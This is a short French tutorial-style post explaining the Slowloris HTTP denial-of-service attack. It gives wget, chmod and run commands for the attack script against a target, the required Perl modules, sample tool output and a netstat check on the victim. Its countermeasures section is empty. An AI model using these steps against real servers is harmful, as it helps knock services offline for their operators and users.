Slowloris est une attaque à la mode elle consiste à ouvrir plusieurs connexions en envoyant des requetes http partielles et au compte-goutte pour conserver les connexions ouvertes le plus longtemps possible ainsi le serveur cible est rapidement saturé, c'est une attaque DoS (deny of service).

A en croire le site http://ha.ckers.org/slowloris/ une grande majorité des serveurs web sont touchés.

Tester la chose :

Avec un script perl

wget http://ha.ckers.org/slowloris/slowloris.pl
chmod +x slowloris.pl
./slowloris.pl -dns ip-cible ou url

Vous aurez peut être comme moi à installer quelques modules perl pour que le script fonctionne.

  • strict
  • IO::Socket::INET
  • IO::Socket::SSL
  • Getopt::Long
  • Config

Une fois lancé vous devriez avoir quelques chose comme ceci :

[...]
Welcome to Slowloris - the low bandwidth, yet greedy and poisonous HTTP client

Defaulting to port 80.
Defaulting to a 5 second tcp connection timeout.
Defaulting to a 100 second re-try timeout.
Defaulting to 1000 connections.
Multithreading enabled.
Connecting to ouitech.net:80 every 100 seconds with 1000 sockets:
		Building sockets.
		Building sockets.
		Building sockets.
[...]

Testez le sur un de VOS serveurs... :p

Vous devriez voir sur la cible avec la commande netstat qui va bien le nombre de connexions simultanées utilisant petit à petit toutes les ressources du serveur qui à la longue ne répondra plus au requête légitime et n'acceptera plus de nouvelles connexions.

netstat -tan | grep ip:80 | wc -l
289

Parer Slowloris :

Il existe plusieurs solutions :

Et sûrement d'autres.

Bon courage à tous :)